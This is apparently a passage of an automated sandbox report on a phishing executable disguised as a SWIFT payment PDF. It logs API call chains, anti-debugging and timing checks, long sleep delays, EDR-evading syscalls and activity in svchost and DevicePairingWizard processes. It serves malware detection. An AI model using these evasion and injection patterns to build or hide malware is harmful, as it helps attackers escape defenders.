Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045221AD pushad ; retf 0004h	12_2_0452223F
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045508CD push ecx; mov dword ptr [esp], ecx	12_2_045508D6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045297A1 push es; iretd	12_2_045297A8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441745F pushad ; retf	12_2_04417467
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441554A push cs; retf	12_2_0441554B

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: \swift mt1o3 payment notification scan copy ref 62587299-24_pdf.exe
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: \swift mt1o3 payment notification scan copy ref 62587299-24_pdf.exe			Jump to behavior

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_0047A330
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00434418

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	API/Special instruction interceptor: Address: 412327C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FFDBFA2D144
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FFDBFA2D604
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FFDBFA2D764
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FFDBFA2D324
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FFDBFA2D364
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FFDBFA2D004
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FFDBFA2FF74
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FFDBFA2D864

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0052483C rdtsc

2_2_0052483C

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Window / User API: threadDelayed 9144

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-87638

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API coverage: 1.7 %

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 2884	Thread sleep count: 121 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 2884	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 2884	Thread sleep count: 9144 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 2884	Thread sleep time: -18288000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760	Thread sleep time: -67500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe TID: 7760	Thread sleep time: -44000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_004788BD
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0044BD27 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0044BF8B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Source: DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: nmlZZxePqIALDF.exe, 0000000D.00000002.5957242228.000000000126F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: firefox.exe, 0000000E.00000002.1735195265.0000022FA5286000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0052483C rdtsc

2_2_0052483C

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00537AF3 LdrLoadDll,

2_2_00537AF3

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0045A370 BlockInput,

0_2_0045A370

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

0_2_0040D590

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_041234E8 mov eax, dword ptr fs:[00000030h]	0_2_041234E8
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_04123548 mov eax, dword ptr fs:[00000030h]	0_2_04123548
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_04121EB8 mov eax, dword ptr fs:[00000030h]	0_2_04121EB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268322 mov eax, dword ptr fs:[00000030h]	2_2_03268322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268322 mov eax, dword ptr fs:[00000030h]	2_2_03268322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268322 mov eax, dword ptr fs:[00000030h]	2_2_03268322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03303336 mov eax, dword ptr fs:[00000030h]	2_2_03303336
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325332D mov eax, dword ptr fs:[00000030h]	2_2_0325332D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E328 mov eax, dword ptr fs:[00000030h]	2_2_0322E328
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E328 mov eax, dword ptr fs:[00000030h]	2_2_0322E328
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E328 mov eax, dword ptr fs:[00000030h]	2_2_0322E328
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03229303 mov eax, dword ptr fs:[00000030h]	2_2_03229303
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03229303 mov eax, dword ptr fs:[00000030h]	2_2_03229303
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF30A mov eax, dword ptr fs:[00000030h]	2_2_032EF30A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B330C mov eax, dword ptr fs:[00000030h]	2_2_032B330C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B330C mov eax, dword ptr fs:[00000030h]	2_2_032B330C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B330C mov eax, dword ptr fs:[00000030h]	2_2_032B330C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B330C mov eax, dword ptr fs:[00000030h]	2_2_032B330C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E310 mov eax, dword ptr fs:[00000030h]	2_2_0324E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E310 mov eax, dword ptr fs:[00000030h]	2_2_0324E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E310 mov eax, dword ptr fs:[00000030h]	2_2_0324E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326631F mov eax, dword ptr fs:[00000030h]	2_2_0326631F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]	2_2_0323B360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]	2_2_0323B360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]	2_2_0323B360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]	2_2_0323B360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]	2_2_0323B360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]	2_2_0323B360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]	2_2_0326E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]	2_2_0326E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]	2_2_0326E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]	2_2_0326E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]	2_2_0326E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]	2_2_0326E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]	2_2_0326E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]	2_2_0326E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE372 mov eax, dword ptr fs:[00000030h]	2_2_032AE372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE372 mov eax, dword ptr fs:[00000030h]	2_2_032AE372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE372 mov eax, dword ptr fs:[00000030h]	2_2_032AE372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE372 mov eax, dword ptr fs:[00000030h]	2_2_032AE372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0371 mov eax, dword ptr fs:[00000030h]	2_2_032B0371
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0371 mov eax, dword ptr fs:[00000030h]	2_2_032B0371
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325237A mov eax, dword ptr fs:[00000030h]	2_2_0325237A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228347 mov eax, dword ptr fs:[00000030h]	2_2_03228347
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228347 mov eax, dword ptr fs:[00000030h]	2_2_03228347
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228347 mov eax, dword ptr fs:[00000030h]	2_2_03228347
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A350 mov eax, dword ptr fs:[00000030h]	2_2_0326A350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032393A6 mov eax, dword ptr fs:[00000030h]	2_2_032393A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032393A6 mov eax, dword ptr fs:[00000030h]	2_2_032393A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC3B0 mov eax, dword ptr fs:[00000030h]	2_2_032AC3B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]	2_2_03231380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]	2_2_03231380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]	2_2_03231380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]	2_2_03231380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]	2_2_03231380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]	2_2_0324F380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]	2_2_0324F380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]	2_2_0324F380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]	2_2_0324F380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]	2_2_0324F380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]	2_2_0324F380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF38A mov eax, dword ptr fs:[00000030h]	2_2_032EF38A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A390 mov eax, dword ptr fs:[00000030h]	2_2_0325A390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A390 mov eax, dword ptr fs:[00000030h]	2_2_0325A390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A390 mov eax, dword ptr fs:[00000030h]	2_2_0325A390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0322E3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0322E3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0322E3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C3C7 mov eax, dword ptr fs:[00000030h]	2_2_0322C3C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032363CB mov eax, dword ptr fs:[00000030h]	2_2_032363CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032633D0 mov eax, dword ptr fs:[00000030h]	2_2_032633D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032643D0 mov ecx, dword ptr fs:[00000030h]	2_2_032643D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE3DD mov eax, dword ptr fs:[00000030h]	2_2_032BE3DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B43D5 mov eax, dword ptr fs:[00000030h]	2_2_032B43D5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0227 mov eax, dword ptr fs:[00000030h]	2_2_032B0227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0227 mov eax, dword ptr fs:[00000030h]	2_2_032B0227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0227 mov eax, dword ptr fs:[00000030h]	2_2_032B0227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A22B mov eax, dword ptr fs:[00000030h]	2_2_0326A22B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A22B mov eax, dword ptr fs:[00000030h]	2_2_0326A22B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A22B mov eax, dword ptr fs:[00000030h]	2_2_0326A22B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250230 mov ecx, dword ptr fs:[00000030h]	2_2_03250230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A200 mov eax, dword ptr fs:[00000030h]	2_2_0322A200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322821B mov eax, dword ptr fs:[00000030h]	2_2_0322821B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BB214 mov eax, dword ptr fs:[00000030h]	2_2_032BB214
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BB214 mov eax, dword ptr fs:[00000030h]	2_2_032BB214
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B273 mov eax, dword ptr fs:[00000030h]	2_2_0322B273
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B273 mov eax, dword ptr fs:[00000030h]	2_2_0322B273
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B273 mov eax, dword ptr fs:[00000030h]	2_2_0322B273
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]	2_2_032C327E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]	2_2_032C327E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]	2_2_032C327E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]	2_2_032C327E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]	2_2_032C327E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]	2_2_032C327E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ED270 mov eax, dword ptr fs:[00000030h]	2_2_032ED270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F124C mov eax, dword ptr fs:[00000030h]	2_2_032F124C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F124C mov eax, dword ptr fs:[00000030h]	2_2_032F124C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F124C mov eax, dword ptr fs:[00000030h]	2_2_032F124C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F124C mov eax, dword ptr fs:[00000030h]	2_2_032F124C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF247 mov eax, dword ptr fs:[00000030h]	2_2_032EF247
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325F24A mov eax, dword ptr fs:[00000030h]	2_2_0325F24A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD250 mov eax, dword ptr fs:[00000030h]	2_2_032AD250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD250 mov ecx, dword ptr fs:[00000030h]	2_2_032AD250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF2AE mov eax, dword ptr fs:[00000030h]	2_2_032EF2AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F92AB mov eax, dword ptr fs:[00000030h]	2_2_032F92AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032542AF mov eax, dword ptr fs:[00000030h]	2_2_032542AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032542AF mov eax, dword ptr fs:[00000030h]	2_2_032542AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B2BC mov eax, dword ptr fs:[00000030h]	2_2_0330B2BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B2BC mov eax, dword ptr fs:[00000030h]	2_2_0330B2BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B2BC mov eax, dword ptr fs:[00000030h]	2_2_0330B2BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B2BC mov eax, dword ptr fs:[00000030h]	2_2_0330B2BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032292AF mov eax, dword ptr fs:[00000030h]	2_2_032292AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C2B0 mov ecx, dword ptr fs:[00000030h]	2_2_0322C2B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE289 mov eax, dword ptr fs:[00000030h]	2_2_032AE289
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03237290 mov eax, dword ptr fs:[00000030h]	2_2_03237290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03237290 mov eax, dword ptr fs:[00000030h]	2_2_03237290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03237290 mov eax, dword ptr fs:[00000030h]	2_2_03237290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032272E0 mov eax, dword ptr fs:[00000030h]	2_2_032272E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0323A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0323A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0323A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0323A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0323A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0323A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032382E0 mov eax, dword ptr fs:[00000030h]	2_2_032382E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032382E0 mov eax, dword ptr fs:[00000030h]	2_2_032382E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032382E0 mov eax, dword ptr fs:[00000030h]	2_2_032382E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032382E0 mov eax, dword ptr fs:[00000030h]	2_2_032382E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D2EC mov eax, dword ptr fs:[00000030h]	2_2_0322D2EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D2EC mov eax, dword ptr fs:[00000030h]	2_2_0322D2EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]	2_2_032402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]	2_2_032402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]	2_2_032402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]	2_2_032402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]	2_2_032402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]	2_2_032402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]	2_2_032402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]	2_2_032402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032532C5 mov eax, dword ptr fs:[00000030h]	2_2_032532C5
